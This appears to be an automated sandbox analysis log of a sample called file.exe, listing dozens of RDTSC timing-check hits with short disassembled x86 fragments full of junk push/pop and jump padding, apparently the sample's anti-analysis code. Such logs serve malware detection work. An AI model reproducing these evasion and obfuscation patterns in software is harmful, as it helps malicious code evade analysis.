Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 351317 second address: 35131B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34FD77 second address: 34FD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34FD7E second address: 34FD84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34FD84 second address: 34FD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34FD99 second address: 34FDAB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB678E7E6E6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3502EF second address: 3502F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3502F9 second address: 3502FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3505A5 second address: 3505D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FB6784C8BE0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3505D0 second address: 3505E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007FB678E7E6E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3505E2 second address: 3505EC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB6784C8BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3505EC second address: 3505FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB678E7E6EBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 350757 second address: 350771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3508F1 second address: 3508F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3508F5 second address: 35090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34FA6D second address: 34FA73 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 357B7C second address: 357B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 357B86 second address: 357B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CED3F second address: 2CED47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3565B8 second address: 3565DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FB678E7E6E6h 0x00000009 jmp 00007FB678E7E6F6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3565DC second address: 3565E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3572A5 second address: 3572AF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB678E7E6E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 357573 second address: 357579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 357579 second address: 3575A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB678E7E6F4h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FB678E7E6E6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3575A1 second address: 3575A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3575A5 second address: 3575D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB678E7E6F2h 0x0000000e jmp 00007FB678E7E6F1h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DDE2C second address: 2DDE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D2390 second address: 2D2394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D2394 second address: 2D23A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D23A0 second address: 2D23A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D23A4 second address: 2D23A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 362090 second address: 3620CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FB678E7E6F7h 0x0000000e pop edi 0x0000000f pushad 0x00000010 jmp 00007FB678E7E6F8h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3620CC second address: 3620D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 321D03 second address: 321D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FB678E7E6E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 321D24 second address: 321DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007FB6784C8BEBh 0x0000000e jo 00007FB6784C8BE5h 0x00000014 jmp 00007FB6784C8BDFh 0x00000019 nop 0x0000001a pushad 0x0000001b mov ebx, dword ptr [ebp+122D2E4Fh] 0x00000021 mov cx, 9A82h 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp+12486A23h] 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FB6784C8BD8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 pushad 0x00000047 mov di, si 0x0000004a call 00007FB6784C8BE2h 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 popad 0x00000053 jmp 00007FB6784C8BDCh 0x00000058 push eax 0x00000059 pushad 0x0000005a ja 00007FB6784C8BDCh 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 321DB1 second address: 30036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, dword ptr [ebp+122D28EDh] 0x0000000f call dword ptr [ebp+122D1DEBh] 0x00000015 push eax 0x00000016 pushad 0x00000017 ja 00007FB678E7E6E6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3221CF second address: 3221D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3221D3 second address: 3221D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3226BF second address: 3226C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3227AC second address: 32281B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FB678E7E6E8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2B28h], edx 0x0000002a push 00000004h 0x0000002c jmp 00007FB678E7E6F7h 0x00000031 nop 0x00000032 pushad 0x00000033 jmp 00007FB678E7E6EBh 0x00000038 jmp 00007FB678E7E6F4h 0x0000003d popad 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32281B second address: 32281F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32281F second address: 322829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322B4C second address: 322B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322B67 second address: 322B95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ecx, 79C3A3A1h 0x00000010 push 0000001Eh 0x00000012 add cx, 9F62h 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB678E7E6F3h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322CAB second address: 322CD0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB6784C8BEBh 0x00000008 jmp 00007FB6784C8BE5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322CD0 second address: 322CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322CD5 second address: 322CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322CDB second address: 322CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322EAA second address: 322ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB6784C8BD6h 0x0000000a popad 0x0000000b jnl 00007FB6784C8BD8h 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FB6784C8BE1h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push edi 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322ED9 second address: 322EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322F9E second address: 322FA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322FA4 second address: 322FFE instructions: 0x00000000 rdtsc 0x00000002 js 00007FB678E7E6E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D2E3Bh] 0x00000013 lea eax, dword ptr [ebp+12486A67h] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FB678E7E6E8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov dword ptr [ebp+1245FF67h], edx 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007FB678E7E6F7h 0x00000040 push esi 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36146F second address: 361474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 361474 second address: 36148B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB678E7E6F3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36148B second address: 36148F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36148F second address: 36149B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36149B second address: 3614B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3614B8 second address: 3614C2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB678E7E6E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 361603 second address: 361609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 361B34 second address: 361B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB678E7E6E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 361B40 second address: 361B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FB6784C8BDEh 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FB6784C8BD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 365F43 second address: 365F5C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB678E7E6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jo 00007FB678E7E6E6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3658FB second address: 365914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB6784C8BE0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 365914 second address: 36592F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007FB678E7E706h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB678E7E6ECh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36592F second address: 36593D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FB6784C8BDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 365A9D second address: 365AA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 365AA9 second address: 365ACE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB6784C8BEBh 0x00000008 je 00007FB6784C8BE2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 365C90 second address: 365CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB678E7E6F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 365CAB second address: 365CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 365CAF second address: 365CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB678E7E6EEh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3683C6 second address: 3683CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3683CA second address: 3683DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB678E7E6EBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3683DE second address: 3683E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36D131 second address: 36D137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36C482 second address: 36C4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FB6784C8BE1h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6784C8BE7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36CA03 second address: 36CA09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36CB4D second address: 36CB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36CB51 second address: 36CB5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36CB5A second address: 36CB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB6784C8BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36CCA3 second address: 36CCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 jmp 00007FB678E7E6EDh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371407 second address: 371410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371410 second address: 371414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371414 second address: 371418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371418 second address: 37141E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371868 second address: 37186D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37186D second address: 371873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371873 second address: 37188D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37188D second address: 37189E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jnp 00007FB678E7E6ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3719C1 second address: 3719C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371B48 second address: 371B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB678E7E6EFh 0x00000009 jbe 00007FB678E7E6E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322975 second address: 322997 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB6784C8BDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jne 00007FB6784C8BD8h 0x00000012 jl 00007FB6784C8BDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322997 second address: 322A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 xor edi, 0BE5C204h 0x0000000c mov ebx, dword ptr [ebp+12486A62h] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FB678E7E6E8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c jne 00007FB678E7E6E6h 0x00000032 clc 0x00000033 add eax, ebx 0x00000035 mov dword ptr [ebp+122D1CF9h], edi 0x0000003b nop 0x0000003c pushad 0x0000003d jno 00007FB678E7E6F7h 0x00000043 pushad 0x00000044 jng 00007FB678E7E6E6h 0x0000004a jp 00007FB678E7E6E6h 0x00000050 popad 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322A0A second address: 322A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
